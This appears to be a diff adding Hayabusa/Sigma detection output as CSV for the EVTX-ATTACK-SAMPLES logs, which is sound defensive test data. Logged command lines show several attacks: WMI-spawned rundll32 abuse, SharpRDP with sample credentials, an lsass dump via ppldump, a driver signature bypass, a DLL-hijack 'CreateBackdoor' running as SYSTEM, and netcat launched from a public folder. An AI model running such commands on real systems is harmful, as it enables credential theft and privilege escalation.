+2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:44:51.016 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: rundll32 url.dll,FileProtocolHandler ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:44:51.122 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe  :  Path: C:\Windows\System32\notepad.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 url.dll,OpenURL ms-browser://  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:46:43.819 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: rundll32 url.dll,OpenURL ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:46:43.836 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe  :  Path: C:\Windows\System32\notepad.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /c start ms-browser://  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:17.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd.exe /c start ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:17.447 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe  :  Path: C:\Windows\System32\notepad.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: explorer ms-browser://  :  Path: C:\Windows\explorer.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:45.293 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding  :  Path: C:\Windows\explorer.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-24 04:09:34.052 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: SharpRDP.exe  computername=192.168.56.1 command=""C:\Temp\file.exe"" username=domain\user password=password  :  Path: C:\ProgramData\USOShared\SharpRDP.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx
+2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path  :  Command: Furutaka.exe  dummy2.sys  :  Path: C:\Users\Public\BYOV\TDL\Furutaka.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
+2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
+2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path  :  Command: ppldump.exe  -p lsass.exe -o a.png  :  Path: C:\Users\Public\BYOV\ZAM64\ppldump.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
+2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
+2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
+2020-03-07 22:17:39.984 +09:00,MSEDGEWIN10,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx
+2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx
+2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx
+2020-03-21 14:00:16.296 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: usoclient  StartInteractiveScan  :  Path: C:\Windows\System32\UsoClient.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:17.980 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:17.992 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:17.997 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.189 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.195 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.221 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.234 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.250 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.392 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.421 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.443 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.499 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path  :  Command: nc.exe  127.0.0.1 1337  :  Path: C:\Users\Public\Tools\nc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:39.441 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:54.689 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management  :  Command: sc  stop CDPSvc  :  Path: C:\Windows\System32\sc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,low,Stop Windows Service,,rules/sigma/process_creation/win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:43.104 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management  :  Command: sc  query CDPSvc  :  Path: C:\Windows\System32\sc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:52.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications  :  Path: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\System32\RuntimeBroker.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net  start CDPSvc  :  Path: C:\Windows\System32\net.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Service Execution,,rules/sigma/process_creation/win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\net1  start CDPSvc  :  Path: C:\Windows\System32\net1.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: net  start CDPSvc,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Service Execution,,rules/sigma/process_creation/win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.919 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path  :  Command: nc.exe  127.0.0.1 1337  :  Path: C:\Users\Public\Tools\nc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
